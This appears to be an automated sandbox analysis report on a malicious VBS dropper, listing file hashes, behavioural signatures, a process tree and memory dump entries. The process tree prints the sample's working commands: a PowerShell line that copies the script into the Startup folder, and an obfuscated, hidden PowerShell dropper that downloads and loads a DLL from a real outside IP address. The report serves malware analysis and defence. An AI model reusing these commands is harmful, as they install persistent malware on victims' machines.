Overview

overview

10

Static

static

92baf7d1d5...db.vbs

windows7_x64

10

92baf7d1d5...db.vbs

windows10_x64

10

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    27-12-2021 20:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    92baf7d1d57f1c7c6368c79646304ddb.vbs

  • Size

    488KB

  • MD5

    92baf7d1d57f1c7c6368c79646304ddb

  • SHA1

    243ea00cea30c24c463b2263479502481458ec41

  • SHA256

    fa0c16419a4f2e838f7f9f72f252b5f391da16d47910c1a7a84d8e3b01d1b550

  • SHA512

    7ddb663e69b9cec619c9211052d3df31b942d7cc56c6c9da4d469ce09c072559eb24544f64974a42c36e9eeb324c30a22029a93e2f04dceeb036c66bc9020c60

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.241.19.49/ramdes/treboldll.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92baf7d1d57f1c7c6368c79646304ddb.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1220
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\92baf7d1d57f1c7c6368c79646304ddb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VHK.vbs')
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1192
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • Runs ping.exe
        PID:472
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\92baf7d1d57f1c7c6368c79646304ddb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VHK.vbs')
        3⤵
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1632
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂Dk⁂MQ⁂u⁂DI⁂N⁂⁂x⁂C4⁂MQ⁂5⁂C4⁂N⁂⁂5⁂C8⁂cgBh⁂G0⁂Z⁂Bl⁂HM⁂LwB0⁂HI⁂ZQBi⁂G8⁂b⁂Bk⁂Gw⁂b⁂⁂u⁂HQ⁂e⁂B0⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂QwBs⁂GE⁂cwBz⁂Ew⁂aQBi⁂HI⁂YQBy⁂Hk⁂Mw⁂u⁂EM⁂b⁂Bh⁂HM⁂cw⁂x⁂Cc⁂KQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBS⁂HU⁂bg⁂n⁂Ck⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂WwBv⁂GI⁂agBl⁂GM⁂d⁂Bb⁂F0⁂XQ⁂g⁂Cg⁂JwB0⁂Hg⁂d⁂⁂u⁂DQ⁂cwBu⁂C8⁂d⁂Bz⁂GU⁂d⁂⁂v⁂Dk⁂N⁂⁂u⁂Dk⁂MQ⁂u⁂DE⁂N⁂⁂y⁂C4⁂MQ⁂5⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/treboldll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2000

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    3d94466afacf69f37dd524b1b0449713

    SHA1

    8c8e11170166a85a06f233042707a44d36167047

    SHA256

    1041a8ead4a4d25d70c34885f24b125398c8812c9ac227c5d5c10d232a190bd2

    SHA512

    7fb3ab46fd31852153c4cf0b30e04ee507cacc1bf7e01f851e5ebe2b5af61b656cd6fe6f059ac848680db226f10d7e67a49df7afa17313fbebab0fa75105bbf4

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    3d94466afacf69f37dd524b1b0449713

    SHA1

    8c8e11170166a85a06f233042707a44d36167047

    SHA256

    1041a8ead4a4d25d70c34885f24b125398c8812c9ac227c5d5c10d232a190bd2

    SHA512

    7fb3ab46fd31852153c4cf0b30e04ee507cacc1bf7e01f851e5ebe2b5af61b656cd6fe6f059ac848680db226f10d7e67a49df7afa17313fbebab0fa75105bbf4

    Download Submit

  • memory/376-67-0x00000000028F0000-0x00000000028F2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/376-74-0x00000000028FB000-0x000000000291A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/376-68-0x00000000028F2000-0x00000000028F4000-memory.dmp

    Filesize

    8KB

    Download

  • memory/376-69-0x00000000028F4000-0x00000000028F7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/376-62-0x0000000000000000-mapping.dmp

    Download

  • memory/376-65-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/472-55-0x0000000000000000-mapping.dmp

    Download

  • memory/1192-54-0x0000000000000000-mapping.dmp

    Download

  • memory/1220-53-0x000007FEFC511000-0x000007FEFC513000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1632-60-0x00000000028D2000-0x00000000028D4000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1632-66-0x00000000028DB000-0x00000000028FA000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1632-59-0x00000000028D0000-0x00000000028D2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1632-61-0x00000000028D4000-0x00000000028D7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1632-58-0x000007FEF3820000-0x000007FEF437D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1632-56-0x0000000000000000-mapping.dmp

    Download

  • memory/2000-70-0x0000000000000000-mapping.dmp

    Download

  • memory/2000-73-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/2000-75-0x00000000022B0000-0x00000000022B2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2000-76-0x00000000022B2000-0x00000000022B4000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2000-77-0x00000000022B4000-0x00000000022B7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2000-78-0x00000000022BB000-0x00000000022DA000-memory.dmp

    Filesize

    124KB

    Download